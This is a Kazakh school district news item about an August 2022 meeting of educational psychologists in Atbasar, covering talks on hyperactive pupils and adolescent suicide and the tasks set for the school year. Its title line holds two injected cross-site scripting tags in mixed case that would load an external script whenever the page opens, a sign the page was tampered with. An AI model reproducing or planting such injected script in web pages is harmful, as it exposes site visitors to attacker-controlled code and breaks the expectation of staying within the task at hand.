Педагог – психологтар секциясының отырысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

27.08.2022

2022 жылғы 26 тамызда "Атбасар қаласының №1 жалпы білім беретін мектебі" КММ базасында Атбасар ауданының педагог – психологтары секциясының отырысы өтті.

Баяндамашылар «Гиперактивті оқушылар», «Сепе ауылының жалпы білім беретін мектебі» КММ педагог – психологы Шамшуалиева Л.С., «Жасөспірімдер ортасындағы суицид.» «№ 3 жалпы білім беретін мектеп» КММ педагог-психологы Савченко Е.Н.

«Шуйское ауылының жалпы білім беретін мектебі» КММ Педагог – психологы Гаас А.А. секция қатысушыларымен «өзіңді сақтайық»  атты психологиялық тренинг өткізді.

Аудан педагог – психологтарының аудандық әдістемелік бірлестігінің жетекшісі Е.И. Поляковская әріптестерін психологиялық қызметтің жұмысын нормативтік – құқықтық қамтамасыз етудегі кейбір өзгерістермен таныстырды.

Ауданның білім беру бөлімінің әдіскері, психологиялық қызметтің кураторы Завьялова Е.В. 2022-2023 оқу жылына арналған негізгі міндеттерді белгіледі.

Отырыс қорытындысы бойынша ұсынымдар әзірленді, секциялық отырысқа қатысушылар сертификаттармен және грамоталармен марапатталды.

Просмотров: 453


Пікір қосу



Деректерді қолтаңбаға қосу